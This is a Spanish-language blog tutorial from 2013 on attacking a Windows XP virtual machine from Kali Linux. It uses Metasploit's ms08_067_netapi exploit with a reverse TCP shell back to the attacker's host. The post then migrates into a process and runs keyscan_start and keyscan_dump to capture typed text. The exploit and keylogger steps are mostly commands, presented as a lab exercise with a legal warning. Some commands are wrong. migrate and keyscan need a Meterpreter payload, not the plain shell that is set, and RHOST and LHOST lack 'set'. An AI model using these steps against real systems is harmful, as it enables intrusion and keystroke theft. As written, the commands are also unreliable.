Menú

Publicidad

Robo de sesión + Keylogger de Windows con Kali Linux

oct 29, 2013 0 comments

En este tutorial vamos a aprender a realizar ataques con un sistema Kali Linux sobre un sistema con Windows XP en entorno controlado con máquinas virtuales.

Antes de empezar deberías saber...

Kali Linux es un SO que cuenta con multitud de herramientas de seguridad informática y con la posibilidad de realizar diferentes apartados de un pentest para poder averiguar las vulnerabilidades de una red para posteriormente hacerla más segura.




Una de las ventajas de Kali es el de poder usarse como CD live o vivo y el propio sistema  al iniciarlo nos ofrece distintas aplicaciones y herramientas de seguridad. 

Si no disponemos de un contrato o licencia para realizar lo que vamos a ver a continuación, no deberías hacerlo, puesto que estaríamos rebasando la línea de lo legal, es por ello que os recomiendo realizarlo en máquinas virtuales en mi caso con Virtual Box.


¿Qué tipos de ataques vamos a realizar?

Los tipos de ataques que vamos a ver a continuación, son:

  • Controlar los procesos de un Windows XP remoto

Debemos tener en cuenta que ambos equipos deben pertenecer a la misma red para que puedan verse. A continuación vamos a ver paso a paso como realizar este ataque.


Controlando procesos de un Windows XP desde Kali

Paso 1: Configuración de red de Kali

a) Configuramos la IP para que pueda verse con la máquina virtual de Windows XP




b) Comprobamos la confirmación de la conexión.




Paso 2: Abrir una terminal y ejecutar msfconsole

Abrimos una terminal y ejecutamos msfconsole, con lo que accederemos al framework de metasploit que contiene Kali




Este proceso puede tardar unos minutos. Al finalizar, nos aparecerá un dibujo como el siguiente realizado con caracteres.



Paso 3: Ejecutar el exploit

a) Selecionar el exploit que usaremos

Escribiremos en la terminal:

use exploit/windows/smb/ms08_067_netapi



b) Selecionar el payload

Escribiremos en la terminal:

set PAYLOAD windows/shell/reverse_tcp


c) Ver las opciones

Escribiremos en la terminal:

show options


d) Le "diremos" a Kali cuál será la víctima y quién la ejecutará, en nuestro caso RHOST será la IP de Windows XP y LHOST nuestra IP de Kali.

Escribiremos en la terminal:

RHOST <Ip de Windows XP>
LHOST <Ip de Kali>





e) Por último ejecutaremos el exploit:

Escribiremos en la terminal:

exploit


f) Comprobaremos que hemos entrado en Windows de forma satisfactoria viendo que estamos navegando en el como vemos en la imagen C:\WINDOWS\system32>


Paso 4: Controlar los procesos y realizar un Keylogger

a) Ver los procesos activos en el Windows remoto:

Escribiremos en la terminal:

set PAYLOAD windows/shell/reverse_tcp
exploit
ps


b) Migraremos el proceso gracias al comando migrate y el PID del proceso. En nuestro caso robaremos un proceso con el notepad.

Escribiremos en la terminal:

migrate <PID del proceso a migrar>


c) Escribiremos algo en el notepad o en el proceso que hemos migrado


d) Realizaremos un keylogger para ver lo que ha escrito. Para ello usaremos el comando Keyscan_start para iniciar el keylogger y a raíz de aquí empezará a guardar lo que se escriba en el proceso migrado. Mostraremos con Keyscan_dump lo que se ha escrito.

Escribiremos en la terminal:

keyscan_start
keyscan_dump


Comentarios

Related Posts

{{posts[0].title}}

{{posts[0].date}} {{posts[0].commentsNum}} {{messages_comments}}

{{posts[1].title}}

{{posts[1].date}} {{posts[1].commentsNum}} {{messages_comments}}

{{posts[2].title}}

{{posts[2].date}} {{posts[2].commentsNum}} {{messages_comments}}

{{posts[3].title}}

{{posts[3].date}} {{posts[3].commentsNum}} {{messages_comments}}

Formulario de contacto